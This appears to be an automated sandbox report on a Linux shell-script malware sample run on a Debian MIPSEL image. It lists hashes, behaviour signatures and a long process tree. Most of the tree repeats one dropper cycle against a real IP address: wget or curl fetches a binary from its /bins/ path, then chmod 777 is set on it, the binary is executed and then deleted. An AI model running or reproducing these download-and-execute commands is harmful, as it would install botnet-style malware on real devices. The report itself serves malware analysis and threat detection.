Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:19
Static task
static1
Behavioral task
behavioral1
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
-
Size
10KB
-
MD5
a5a9f72ca25763058aacf1994a85b616
-
SHA1
748843de754f9484c22ebf1e32e5894d70f4859f
-
SHA256
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86
-
SHA512
47f9975ff7556dfa8ceecd5af09a40a67e07ddd1478bfee1cbe1189d252b5fe35d0a098fa94c5aa6aa5694f33bb0b776685ddd59772184b7d42fa2a5d78e6cea
-
SSDEEP
192:oPTGhYwtdd5GFV2ER73e7jb18jgZPTGhYwDd5GFVW73e7jVIU:QgbEo18Uftx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:738
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:745
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:751
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:768
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:808
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:814
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:822
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:853
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:865
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:871
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:877
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:883
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:889
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:895
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:901
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:907
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:913
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:919
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:925
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:931
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:937
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:943
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:949
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:955
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:961
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:967
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:973
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:979
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97